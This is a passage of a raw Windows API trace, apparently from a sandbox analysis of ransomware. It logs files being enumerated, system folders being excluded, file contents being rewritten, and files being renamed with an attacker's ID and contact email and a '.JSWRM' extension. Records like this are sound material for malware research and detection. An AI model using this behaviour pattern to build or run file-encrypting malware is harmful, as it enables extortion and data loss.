lpUsedDefaultChar=0x0) returned 5 [0094.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0094.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.691] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24187) returned 1 [0094.691] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e70) returned 0x24d210 [0094.692] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5e70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5e70, lpOverlapped=0x0) returned 1 [0094.695] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.695] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5e70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5e70, lpOverlapped=0x0) returned 1 [0094.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.695] CloseHandle (hObject=0x314) returned 1 [0094.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0094.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0094.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0094.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0094.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0094.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0094.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0094.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0094.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0094.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0094.696] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746g.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746g.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0094.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0094.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0094.696] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1027b233, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1027b233, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102a14ae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7d84, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02746U.BMP", cAlternateFileName="")) returned 1 [0094.697] lstrcmpiW (lpString1="PH02746U.BMP", lpString2=".") returned 1 [0094.697] lstrcmpiW (lpString1="PH02746U.BMP", lpString2="..") returned 1 [0094.697] lstrcmpiW (lpString1="PH02746U.BMP", lpString2="...") returned 1 [0094.697] lstrcmpiW (lpString1="PH02746U.BMP", lpString2="windows") returned -1 [0094.697] lstrcmpiW (lpString1="PH02746U.BMP", lpString2="recovery") returned -1 [0094.697] lstrcmpiW (lpString1="PH02746U.BMP", lpString2="perflogs") returned 1 [0094.697] lstrcmpiW (lpString1="PH02746U.BMP", lpString2="documents and settings") returned 1 [0094.697] lstrcmpiW (lpString1="PH02746U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.697] lstrcmpiW (lpString1="PH02746U.BMP", lpString2="system volume information") returned -1 [0094.697] lstrcmpiW (lpString1="PH02746U.BMP", lpString2="msocache") returned 1 [0094.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0094.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02746U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02746U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02746U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0094.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0094.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02746U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02746U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02746U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0094.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0094.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0094.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0094.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.698] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32132) returned 1 [0094.698] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7d80) returned 0x24d210 [0094.698] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7d80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7d80, lpOverlapped=0x0) returned 1 [0094.797] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.798] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7d80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7d80, lpOverlapped=0x0) returned 1 [0094.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.799] CloseHandle (hObject=0x314) returned 1 [0094.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0094.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0094.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0094.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0094.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0094.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0094.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0094.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0094.799] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0094.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0094.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0094.801] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1027b233, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1027b233, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102a14ae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6090, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02748G.GIF", cAlternateFileName="")) returned 1 [0094.801] lstrcmpiW (lpString1="PH02748G.GIF", lpString2=".") returned 1 [0094.801] lstrcmpiW (lpString1="PH02748G.GIF", lpString2="..") returned 1 [0094.801] lstrcmpiW (lpString1="PH02748G.GIF", lpString2="...") returned 1 [0094.801] lstrcmpiW (lpString1="PH02748G.GIF", lpString2="windows") returned -1 [0094.801] lstrcmpiW (lpString1="PH02748G.GIF", lpString2="recovery") returned -1 [0094.801] lstrcmpiW (lpString1="PH02748G.GIF", lpString2="perflogs") returned 1 [0094.801] lstrcmpiW (lpString1="PH02748G.GIF", lpString2="documents and settings") returned 1 [0094.801] lstrcmpiW (lpString1="PH02748G.GIF", lpString2="$RECYCLE.BIN") returned 1 [0094.801] lstrcmpiW (lpString1="PH02748G.GIF", lpString2="system volume information") returned -1 [0094.801] lstrcmpiW (lpString1="PH02748G.GIF", lpString2="msocache") returned 1 [0094.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0094.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02748G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02748G.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02748G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0094.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0094.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02748G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02748G.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02748G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0094.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0094.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0094.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0094.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.802] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24720) returned 1 [0094.802] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6090) returned 0x24d210 [0094.803] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6090, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6090, lpOverlapped=0x0) returned 1 [0094.806] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.806] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6090, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6090, lpOverlapped=0x0) returned 1 [0094.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.806] CloseHandle (hObject=0x314) returned 1 [0094.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0094.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0094.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0094.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0094.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0094.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0094.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0094.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0094.807] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748g.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748g.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0094.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0094.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0094.808] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1025500d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1025500d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e90, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02748U.BMP", cAlternateFileName="")) returned 1 [0094.808] lstrcmpiW (lpString1="PH02748U.BMP", lpString2=".") returned 1 [0094.808] lstrcmpiW (lpString1="PH02748U.BMP", lpString2="..") returned 1 [0094.808] lstrcmpiW (lpString1="PH02748U.BMP", lpString2="...") returned 1 [0094.808] lstrcmpiW (lpString1="PH02748U.BMP", lpString2="windows") returned -1 [0094.808] lstrcmpiW (lpString1="PH02748U.BMP", lpString2="recovery") returned -1 [0094.808] lstrcmpiW (lpString1="PH02748U.BMP", lpString2="perflogs") returned 1 [0094.808] lstrcmpiW (lpString1="PH02748U.BMP", lpString2="documents and settings") returned 1 [0094.808] lstrcmpiW (lpString1="PH02748U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.808] lstrcmpiW (lpString1="PH02748U.BMP", lpString2="system volume information") returned -1 [0094.808] lstrcmpiW (lpString1="PH02748U.BMP", lpString2="msocache") returned 1 [0094.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0094.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02748U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02748U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02748U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0094.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0094.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02748U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02748U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02748U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0094.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0094.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0094.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0094.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.810] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32400) returned 1 [0094.810] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7e90) returned 0x24d210 [0094.810] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7e90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7e90, lpOverlapped=0x0) returned 1 [0094.813] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.813] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7e90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7e90, lpOverlapped=0x0) returned 1 [0094.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.814] CloseHandle (hObject=0x314) returned 1 [0094.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0094.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0094.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 